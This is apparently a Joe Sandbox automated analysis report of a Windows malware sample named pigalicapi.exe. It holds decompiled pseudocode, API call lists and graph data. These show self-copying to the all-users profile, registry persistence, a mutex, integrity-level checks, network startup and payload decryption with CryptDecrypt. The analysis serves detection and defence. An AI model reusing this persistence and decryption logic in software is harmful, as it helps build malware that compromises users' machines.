                                                                                                                                                                                                                                                                            					_t125 =  *0x7c19a8; // 0x1d
                                                                                                                                                                                                                                                                            					_v12081 = _t125;
                                                                                                                                                                                                                                                                            					 *0x7c4378 = 0x10;
                                                                                                                                                                                                                                                                            					if(( *0x7c435f & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						_t118 =  *0x7c4378; // 0x1b
                                                                                                                                                                                                                                                                            						 *0x7c4378 = _t118 | 0x00000008;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(( *0x7c435c & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						_t161 =  *0x7c4378; // 0x1b
                                                                                                                                                                                                                                                                            						 *0x7c4378 = _t161 | 0x00000001;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(( *0x7c435b & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						_t140 =  *0x7c4378; // 0x1b
                                                                                                                                                                                                                                                                            						 *0x7c4378 = _t140 | 0x00000004;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(( *0x7c435e & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						_t116 =  *0x7c4378; // 0x1b
                                                                                                                                                                                                                                                                            						 *0x7c4378 = _t116 | 0x00000002;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(( *0x7c4360 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						_t159 =  *0x7c4378; // 0x1b
                                                                                                                                                                                                                                                                            						 *0x7c4378 = _t159 | 0x00000020;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t91 =  *0x7c4361 & 0x000000ff;
                                                                                                                                                                                                                                                                            					if(( *0x7c4361 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						_t138 =  *0x7c4378; // 0x1b
                                                                                                                                                                                                                                                                            						 *0x7c4378 = _t138 | 0x00000040;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v9564 = 0x9c3;
                                                                                                                                                                                                                                                                            					E007B7D20(_t91,  &_v12068, 0, 0x9c4);
                                                                                                                                                                                                                                                                            					E007BA700();
                                                                                                                                                                                                                                                                            					E007BA4B0( &_v12068,  &_v9564, 0x7c3cb6,  *0x7c3cb4 & 0x0000ffff);
                                                                                                                                                                                                                                                                            					_v9560 = 0;
                                                                                                                                                                                                                                                                            					_t97 = E007B5B50( &_v12068, ";",  &_v9560, 0); // executed
                                                                                                                                                                                                                                                                            					_v12072 = _t97;
                                                                                                                                                                                                                                                                            					_v12092 = 0;
                                                                                                                                                                                                                                                                            					_v12080 = 0;
                                                                                                                                                                                                                                                                            					_v12076 = 0x4b0;
                                                                                                                                                                                                                                                                            					_t98 = E007B8A70(0x7c2c34,  &_v12076, 0x7c2ba8, 0x8c, 0x7be008, 0x254); // executed
                                                                                                                                                                                                                                                                            					_t177 = _t173 + 0x44;
                                                                                                                                                                                                                                                                            					if(_t98 != 0) {
                                                                                                                                                                                                                                                                            						E007B7D20( &_v9556,  &_v9556, 0, 0x1f40);
                                                                                                                                                                                                                                                                            						E007B78D0(0x7c2c34, 0xc8,  &_v9556, 0xc8);
                                                                                                                                                                                                                                                                            						_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                            						_v12092 =  &_v9556;
                                                                                                                                                                                                                                                                            						_v12080 = 0xc8;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v12088 = 0;
                                                                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                                                                            					_v12101 = 0;
                                                                                                                                                                                                                                                                            					_v12108 = 0x1d4c0;
                                                                                                                                                                                                                                                                            					_v12096 = 0;
                                                                                                                                                                                                                                                                            					_t100 = E007B7970( &_v12096); // executed
                                                                                                                                                                                                                                                                            					_v12100 = _t100;
                                                                                                                                                                                                                                                                            					_t102 = E007B4020(_v12096, _v12100,  &_v1148, 1, 2, 0);
                                                                                                                                                                                                                                                                            					_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                            					if((_t102 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						_v12101 = 1;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t104 = E007B4020(_v12092, _v12080,  &_v1148, 1, 5, 0);
                                                                                                                                                                                                                                                                            						_t177 = _t177 + 0x18;
                                                                                                                                                                                                                                                                            						if((_t104 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            							_v12101 = 1;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_t106 = E007B4020(_v9560, _v12072,  &_v1148, 3, 0xa, 1); // executed
                                                                                                                                                                                                                                                                            							_t177 = _t177 + 0x18;
                                                                                                                                                                                                                                                                            							if((_t106 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            								_v12101 = 1;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v12116 = 0;
                                                                                                                                                                                                                                                                            								_v12112 = E007B42E0( &_v12116);
                                                                                                                                                                                                                                                                            								_t110 = E007B4020(_v12116, _v12112,  &_v1148, 1, 0x17, 0);
                                                                                                                                                                                                                                                                            								_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                            								if((_t110 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            									_v12101 = 1;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								if(_v12116 != 0) {
                                                                                                                                                                                                                                                                            									VirtualFree(_v12116, 0, 0x8000);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if((_v12101 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						if( *0x7c18a4 != 1) {
                                                                                                                                                                                                                                                                            							if( *0x7c18a4 == 2) {
                                                                                                                                                                                                                                                                            								 *0x7c18a4 = 1;
                                                                                                                                                                                                                                                                            								_v12108 = 0x1499700;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							if( *0x7c30e4 != 2) {
                                                                                                                                                                                                                                                                            								_v12108 = 0x1499700;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v12108 = 0x3e8;
                                                                                                                                                                                                                                                                            								 *0x7c18a4 = 2;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					Sleep(_v12108);
                                                                                                                                                                                                                                                                            					goto L17;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}





















































                                                                                                                                                                                                                                                                            0x007b3b08
                                                                                                                                                                                                                                                                            0x007b3b12
                                                                                                                                                                                                                                                                            0x007b3b19
                                                                                                                                                                                                                                                                            0x007b3b2d
                                                                                                                                                                                                                                                                            0x007b3b38
                                                                                                                                                                                                                                                                            0x007b3b40
                                                                                                                                                                                                                                                                            0x007b3b4f
                                                                                                                                                                                                                                                                            0x007b3b54
                                                                                                                                                                                                                                                                            0x007b3b5c
                                                                                                                                                                                                                                                                            0x007b400a
                                                                                                                                                                                                                                                                            0x007b400c
                                                                                                                                                                                                                                                                            0x007b400c
                                                                                                                                                                                                                                                                            0x007b3b70
                                                                                                                                                                                                                                                                            0x007b3b7f
                                                                                                                                                                                                                                                                            0x007b3b8c
                                                                                                                                                                                                                                                                            0x007b3b9a
                                                                                                                                                                                                                                                                            0x007b3ba2
                                                                                                                                                                                                                                                                            0x007b3bb4
                                                                                                                                                                                                                                                                            0x007b3bca
                                                                                                                                                                                                                                                                            0x007b3bd2
                                                                                                                                                                                                                                                                            0x007b3bd7
                                                                                                                                                                                                                                                                            0x007b3be1
                                                                                                                                                                                                                                                                            0x007b3be6
                                                                                                                                                                                                                                                                            0x007b3beb
                                                                                                                                                                                                                                                                            0x007b3bfa
                                                                                                                                                                                                                                                                            0x007b3c02
                                                                                                                                                                                                                                                                            0x007b3c06
                                                                                                                                                                                                                                                                            0x007b3c2a
                                                                                                                                                                                                                                                                            0x007b3c34
                                                                                                                                                                                                                                                                            0x007b3c3c
                                                                                                                                                                                                                                                                            0x007b3c41
                                                                                                                                                                                                                                                                            0x007b3c48
                                                                                                                                                                                                                                                                            0x007b3c4d
                                                                                                                                                                                                                                                                            0x007b3c53
                                                                                                                                                                                                                                                                            0x007b3c64
                                                                                                                                                                                                                                                                            0x007b3c6c
                                                                                                                                                                                                                                                                            0x007b3c71
                                                                                                                                                                                                                                                                            0x007b3c74
                                                                                                                                                                                                                                                                            0x007b3c79
                                                                                                                                                                                                                                                                            0x007b3c7f
                                                                                                                                                                                                                                                                            0x007b3c80
                                                                                                                                                                                                                                                                            0x007b3c85
                                                                                                                                                                                                                                                                            0x007b3c8c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b3c92
                                                                                                                                                                                                                                                                            0x007b3c92
                                                                                                                                                                                                                                                                            0x007b3c98
                                                                                                                                                                                                                                                                            0x007b3c9e
                                                                                                                                                                                                                                                                            0x007b3cb1
                                                                                                                                                                                                                                                                            0x007b3cb3
                                                                                                                                                                                                                                                                            0x007b3cbb
                                                                                                                                                                                                                                                                            0x007b3cbb
                                                                                                                                                                                                                                                                            0x007b3cc9
                                                                                                                                                                                                                                                                            0x007b3ccb
                                                                                                                                                                                                                                                                            0x007b3cd4
                                                                                                                                                                                                                                                                            0x007b3cd4
                                                                                                                                                                                                                                                                            0x007b3ce3
                                                                                                                                                                                                                                                                            0x007b3ce5
                                                                                                                                                                                                                                                                            0x007b3cee
                                                                                                                                                                                                                                                                            0x007b3cee
                                                                                                                                                                                                                                                                            0x007b3cfd
                                                                                                                                                                                                                                                                            0x007b3cff
                                                                                                                                                                                                                                                                            0x007b3d07
                                                                                                                                                                                                                                                                            0x007b3d07
                                                                                                                                                                                                                                                                            0x007b3d15
                                                                                                                                                                                                                                                                            0x007b3d17
                                                                                                                                                                                                                                                                            0x007b3d20
                                                                                                                                                                                                                                                                            0x007b3d20
                                                                                                                                                                                                                                                                            0x007b3d26
                                                                                                                                                                                                                                                                            0x007b3d2f
                                                                                                                                                                                                                                                                            0x007b3d31
                                                                                                                                                                                                                                                                            0x007b3d3a
                                                                                                                                                                                                                                                                            0x007b3d3a
                                                                                                                                                                                                                                                                            0x007b3d40
                                                                                                                                                                                                                                                                            0x007b3d58
                                                                                                                                                                                                                                                                            0x007b3d60
                                                                                                                                                                                                                                                                            0x007b3d80
                                                                                                                                                                                                                                                                            0x007b3d88
                                                                                                                                                                                                                                                                            0x007b3da7
                                                                                                                                                                                                                                                                            0x007b3daf
                                                                                                                                                                                                                                                                            0x007b3db5
                                                                                                                                                                                                                                                                            0x007b3dbf
                                                                                                                                                                                                                                                                            0x007b3dc9
                                                                                                                                                                                                                                                                            0x007b3df3
                                                                                                                                                                                                                                                                            0x007b3df8
                                                                                                                                                                                                                                                                            0x007b3dfd
                                                                                                                                                                                                                                                                            0x007b3e0d
                                                                                                                                                                                                                                                                            0x007b3e2b
                                                                                                                                                                                                                                                                            0x007b3e30
                                                                                                                                                                                                                                                                            0x007b3e39
                                                                                                                                                                                                                                                                            0x007b3e3f
                                                                                                                                                                                                                                                                            0x007b3e3f
                                                                                                                                                                                                                                                                            0x007b3e49
                                                                                                                                                                                                                                                                            0x007b3e53
                                                                                                                                                                                                                                                                            0x007b3e53
                                                                                                                                                                                                                                                                            0x007b3e5a
                                                                                                                                                                                                                                                                            0x007b3e64
                                                                                                                                                                                                                                                                            0x007b3e75
                                                                                                                                                                                                                                                                            0x007b3e7d
                                                                                                                                                                                                                                                                            0x007b3e9e
                                                                                                                                                                                                                                                                            0x007b3ea3
                                                                                                                                                                                                                                                                            0x007b3eab
                                                                                                                                                                                                                                                                            0x007b3f8a
                                                                                                                                                                                                                                                                            0x007b3eb1
                                                                                                                                                                                                                                                                            0x007b3ecc
                                                                                                                                                                                                                                                                            0x007b3ed1
                                                                                                                                                                                                                                                                            0x007b3ed9
                                                                                                                                                                                                                                                                            0x007b3f81
                                                                                                                                                                                                                                                                            0x007b3edf
                                                                                                                                                                                                                                                                            0x007b3efa
                                                                                                                                                                                                                                                                            0x007b3eff
                                                                                                                                                                                                                                                                            0x007b3f07
                                                                                                                                                                                                                                                                            0x007b3f78
                                                                                                                                                                                                                                                                            0x007b3f09
                                                                                                                                                                                                                                                                            0x007b3f09
                                                                                                                                                                                                                                                                            0x007b3f22
                                                                                                                                                                                                                                                                            0x007b3f43
                                                                                                                                                                                                                                                                            0x007b3f48
                                                                                                                                                                                                                                                                            0x007b3f50
                                                                                                                                                                                                                                                                            0x007b3f52
                                                                                                                                                                                                                                                                            0x007b3f52
                                                                                                                                                                                                                                                                            0x007b3f60
                                                                                                                                                                                                                                                                            0x007b3f70
                                                                                                                                                                                                                                                                            0x007b3f70
                                                                                                                                                                                                                                                                            0x007b3f76
                                                                                                                                                                                                                                                                            0x007b3f7f
                                                                                                                                                                                                                                                                            0x007b3f88
                                                                                                                                                                                                                                                                            0x007b3f9a
                                                                                                                                                                                                                                                                            0x007b3fa3
                                                                                                                                                                                                                                                                            0x007b3fd7
                                                                                                                                                                                                                                                                            0x007b3fd9
                                                                                                                                                                                                                                                                            0x007b3fe3
                                                                                                                                                                                                                                                                            0x007b3fe3
                                                                                                                                                                                                                                                                            0x007b3fa5
                                                                                                                                                                                                                                                                            0x007b3fac
                                                                                                                                                                                                                                                                            0x007b3fc4
                                                                                                                                                                                                                                                                            0x007b3fae
                                                                                                                                                                                                                                                                            0x007b3fae
                                                                                                                                                                                                                                                                            0x007b3fb8
                                                                                                                                                                                                                                                                            0x007b3fb8
                                                                                                                                                                                                                                                                            0x007b3fce
                                                                                                                                                                                                                                                                            0x007b3fa3
                                                                                                                                                                                                                                                                            0x007b3ff4
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b3ff4

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\pigalicapi.exe,00000208), ref: 007B3B2D
                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNELBASE(007B5DB0), ref: 007B3B38
                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 007B3B40
                                                                                                                                                                                                                                                                              • Part of subcall function 007B4510: GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 007B456C
                                                                                                                                                                                                                                                                              • Part of subcall function 007B4510: CreateFileA.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 007B458B
                                                                                                                                                                                                                                                                              • Part of subcall function 007B4510: GetFileSize.KERNEL32(000000FF,00000000), ref: 007B45AD
                                                                                                                                                                                                                                                                              • Part of subcall function 007B4510: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 007B45D6
                                                                                                                                                                                                                                                                              • Part of subcall function 007B4510: ReadFile.KERNELBASE(000000FF,00000000,00000000,00000000,00000000), ref: 007B4617
                                                                                                                                                                                                                                                                              • Part of subcall function 007B4510: FindCloseChangeNotification.KERNELBASE(000000FF), ref: 007B463E
                                                                                                                                                                                                                                                                              • Part of subcall function 007B4510: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007B47C0
                                                                                                                                                                                                                                                                              • Part of subcall function 007B4510: CloseHandle.KERNEL32(00000000), ref: 007B47E0
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 007B400C
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5700: GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 007B5742
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5700: lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 007B57B8
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5700: GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 007B57F1
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5700: wnsprintfA.SHLWAPI ref: 007B582F
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5700: CreateFileA.KERNELBASE(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 007B5854
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5700: GetFileSize.KERNEL32(000000FF,00000000), ref: 007B586D
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5A00: lstrcpyA.KERNEL32(Qawoqmsckgkay,WDefault), ref: 007B5A47
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5A00: lstrlenA.KERNEL32(007BC4E0), ref: 007B5A7D
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5A00: lstrcpyA.KERNEL32(00000000,007BC4E0), ref: 007B5A97
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5A00: lstrlenA.KERNEL32(00000000), ref: 007B5AA1
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5A00: lstrlenA.KERNEL32(Qawoqmsckgkay), ref: 007B5AAE
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5A00: lstrcatA.KERNEL32(00000000,Qawoqmsckgkay), ref: 007B5AC8
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5A00: RegCreateKeyExA.KERNELBASE(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 007B5B00
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5A00: RegCloseKey.KERNELBASE(00000000), ref: 007B5B0E
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5A00: lstrlenA.KERNEL32(00000000), ref: 007B5B3B
                                                                                                                                                                                                                                                                              • Part of subcall function 007B9400: lstrcpyA.KERNEL32(?,00000000), ref: 007B9513
                                                                                                                                                                                                                                                                              • Part of subcall function 007B9400: CharUpperA.USER32(?), ref: 007B9521
                                                                                                                                                                                                                                                                              • Part of subcall function 007B99F0: GetCurrentProcess.KERNEL32(00000008,?), ref: 007B9A0A
                                                                                                                                                                                                                                                                              • Part of subcall function 007B99F0: OpenProcessToken.ADVAPI32(00000000), ref: 007B9A11
                                                                                                                                                                                                                                                                              • Part of subcall function 007B99F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 007B9A3A
                                                                                                                                                                                                                                                                              • Part of subcall function 007B99F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 007B9A77
                                                                                                                                                                                                                                                                              • Part of subcall function 007B99F0: CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 007B9AAD
                                                                                                                                                                                                                                                                              • Part of subcall function 007B99F0: EqualSid.ADVAPI32(?,00000000), ref: 007B9AC3
                                                                                                                                                                                                                                                                              • Part of subcall function 007B6060: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 007B6082
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5E00: CreateMutexA.KERNELBASE(00000000,00000000,pigalicapi,?,007B3BEB), ref: 007B5E0C
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5E00: GetLastError.KERNEL32(?,007B3BEB), ref: 007B5E12
                                                                                                                                                                                                                                                                            • StrStrIA.KERNELBASE(C:\Users\user\pigalicapi.exe,svchost.exe), ref: 007B3BFA
                                                                                                                                                                                                                                                                              • Part of subcall function 007B1120: lstrlenA.KERNEL32(00000000), ref: 007B1148
                                                                                                                                                                                                                                                                              • Part of subcall function 007B1120: lstrlenA.KERNEL32(00000000), ref: 007B115A
                                                                                                                                                                                                                                                                              • Part of subcall function 007B1120: GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 007B1182
                                                                                                                                                                                                                                                                              • Part of subcall function 007B1120: wnsprintfA.SHLWAPI ref: 007B11BD
                                                                                                                                                                                                                                                                              • Part of subcall function 007B1120: lstrcmpiA.KERNEL32(00000104,?), ref: 007B11D1
                                                                                                                                                                                                                                                                              • Part of subcall function 007B1120: CopyFileA.KERNEL32(00000104,?,00000000), ref: 007B11F0
                                                                                                                                                                                                                                                                              • Part of subcall function 007B1120: SetFileAttributesA.KERNEL32(?,00000006), ref: 007B11FF
                                                                                                                                                                                                                                                                              • Part of subcall function 007B1120: lstrcpyA.KERNEL32(00000104,?), ref: 007B1210
                                                                                                                                                                                                                                                                              • Part of subcall function 007B1120: lstrcpyA.KERNEL32(00000000,?), ref: 007B1249
                                                                                                                                                                                                                                                                              • Part of subcall function 007B1120: lstrcpyA.KERNEL32(-00000208,00000000), ref: 007B125D
                                                                                                                                                                                                                                                                              • Part of subcall function 007B1120: CreateThread.KERNELBASE(00000000,00000000,007B12D0,00000000,00000000,00000000), ref: 007B1274
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5E30: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,000F003F,00000000), ref: 007B5E7E
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5E30: RegQueryValueExA.KERNELBASE(00000000,?,00000000,00000000,?,00000020), ref: 007B5EB2
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5E30: RegDeleteValueA.ADVAPI32(00000000,?), ref: 007B5ED6
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5E30: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 007B5F0B
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5E30: RegCloseKey.KERNELBASE(00000000), ref: 007B5F19
                                                                                                                                                                                                                                                                              • Part of subcall function 007B6CF0: RegOpenKeyExA.KERNELBASE(80000001,007C3B88,00000000,000F003F,00000000), ref: 007B6D30
                                                                                                                                                                                                                                                                              • Part of subcall function 007B6CF0: RegQueryValueExA.KERNELBASE(00000000,007C3FA6,00000000,00000003,?,00000020), ref: 007B6D61
                                                                                                                                                                                                                                                                              • Part of subcall function 007B6CF0: RegDeleteValueA.ADVAPI32(00000000,007C3FA6), ref: 007B6D7E
                                                                                                                                                                                                                                                                              • Part of subcall function 007B6CF0: RegCloseKey.ADVAPI32(00000000), ref: 007B6D88
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5F30: lstrcpyA.KERNEL32(?,pigalicapi), ref: 007B5F67
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5F30: lstrcatA.KERNEL32(?,007C3FE2), ref: 007B5F7A
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5F30: RegOpenKeyExA.ADVAPI32(80000001,X<{,00000000,000F003F,00000000), ref: 007B5FB3
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5F30: RegQueryValueExA.KERNELBASE(00000000,?,00000000,00000000,?,00000020), ref: 007B5FF2
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5F30: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 007B603B
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5F30: RegCloseKey.ADVAPI32(00000000), ref: 007B6045
                                                                                                                                                                                                                                                                            • WSAStartup.WS2_32(00000202,?), ref: 007B3C85
                                                                                                                                                                                                                                                                              • Part of subcall function 007B4020: InitializeCriticalSection.KERNEL32(?), ref: 007B4066
                                                                                                                                                                                                                                                                              • Part of subcall function 007B4020: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 007B407A
                                                                                                                                                                                                                                                                              • Part of subcall function 007B4020: EnterCriticalSection.KERNEL32(?,?), ref: 007B40AF
                                                                                                                                                                                                                                                                              • Part of subcall function 007B4020: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007B40C6
                                                                                                                                                                                                                                                                              • Part of subcall function 007B4020: TerminateThread.KERNEL32(00000000,00000000), ref: 007B40E6
                                                                                                                                                                                                                                                                              • Part of subcall function 007B4020: ResetEvent.KERNEL32(00000000), ref: 007B40F7
                                                                                                                                                                                                                                                                              • Part of subcall function 007B4020: LeaveCriticalSection.KERNEL32(?), ref: 007B4101
                                                                                                                                                                                                                                                                              • Part of subcall function 007B4020: CreateThread.KERNELBASE(00000000,00000000,007B4AC0,00000000,00000000,00000000), ref: 007B4118
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007B3F70
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(?), ref: 007B3FF4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$Createlstrcpy$Value$Closelstrlen$ModuleNameOpenVirtual$CriticalFreeProcessQuerySectionThreadToken$DeleteDirectoryEventInformationInitializeProfileSizeUserslstrcatwnsprintf$AllocAttributesChangeCharCopyCurrentEnterEqualErrorExceptionExitFilterFindHandleKnownLastLeaveMutexNotificationReadResetSleepStartupTerminateUnhandledUpperWelllstrcmpi
                                                                                                                                                                                                                                                                            • String ID: C:\Users\user\pigalicapi.exe$Lyoxokxeruqp$R+g$pigalicapi$svchost.exe
                                                                                                                                                                                                                                                                            • API String ID: 1389186475-1208453679
                                                                                                                                                                                                                                                                            • Opcode ID: 87434203708c5305c3cb1111cc837c5b9507d87fd0d46aeb4b12d1388653d215
                                                                                                                                                                                                                                                                            • Instruction ID: 243d3107b02deeadabf66ae647ca688a2079fbe255f983ceb59175192a87612e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87434203708c5305c3cb1111cc837c5b9507d87fd0d46aeb4b12d1388653d215
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3DC116B0944364EAEB24EB649C6AFFA37B06B45700F0480EDF648661D2DB7C5B84CF65
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 726 7b4880-7b489d 728 7b4a9f-7b4ab1 CryptReleaseContext 726->728 729 7b48a3-7b48f3 call 7b7b70 CryptCreateHash 726->729 733 7b48f9-7b4913 CryptHashData 729->733 734 7b4a90-7b4a96 729->734 737 7b4919-7b4944 CryptDeriveKey 733->737 738 7b4a83-7b4a8a CryptDestroyHash 733->738 735 7b4a9a 734->735 736 7b4a98 734->736 735->728 736->728 737->738 739 7b494a-7b498f CryptDecrypt CryptDestroyKey 737->739 738->734 739->738 740 7b4995-7b49b1 CryptCreateHash 739->740 740->738 741 7b49b7-7b49d4 CryptHashData 740->741 742 7b49da-7b4a0f CryptGetHashParam 741->742 743 7b4a76-7b4a7d CryptDestroyHash 741->743 742->743 744 7b4a11-7b4a3c CryptGetHashParam 742->744 743->738 744->743 745 7b4a3e-7b4a58 call 7b7c70 744->745 745->743 748 7b4a5a-7b4a72 call 7b7b70 745->748 748->743
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 007B48EB
                                                                                                                                                                                                                                                                            • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 007B490B
                                                                                                                                                                                                                                                                            • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 007B493C
                                                                                                                                                                                                                                                                            • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 007B496F
                                                                                                                                                                                                                                                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 007B4982
                                                                                                                                                                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 007B49A9
                                                                                                                                                                                                                                                                            • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 007B49CC
                                                                                                                                                                                                                                                                            • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 007B4A07
                                                                                                                                                                                                                                                                            • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 007B4A34
                                                                                                                                                                                                                                                                            • CryptDestroyHash.ADVAPI32(?), ref: 007B4A7D
                                                                                                                                                                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 007B4A8A
                                                                                                                                                                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 007B4AA5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$Hash$Destroy$CreateDataParam$ContextDecryptDeriveRelease
                                                                                                                                                                                                                                                                            • String ID: eF{
                                                                                                                                                                                                                                                                            • API String ID: 2727466597-3500773614
                                                                                                                                                                                                                                                                            • Opcode ID: 022ad6735274eca1bacb20ca1096ec9c2ffba615014bbf335e885f49c5a60a12
                                                                                                                                                                                                                                                                            • Instruction ID: d7df0a93b2f6574742e4b4d7aef2ec40ed54da79be0e7a4346dc7774bfdbefca
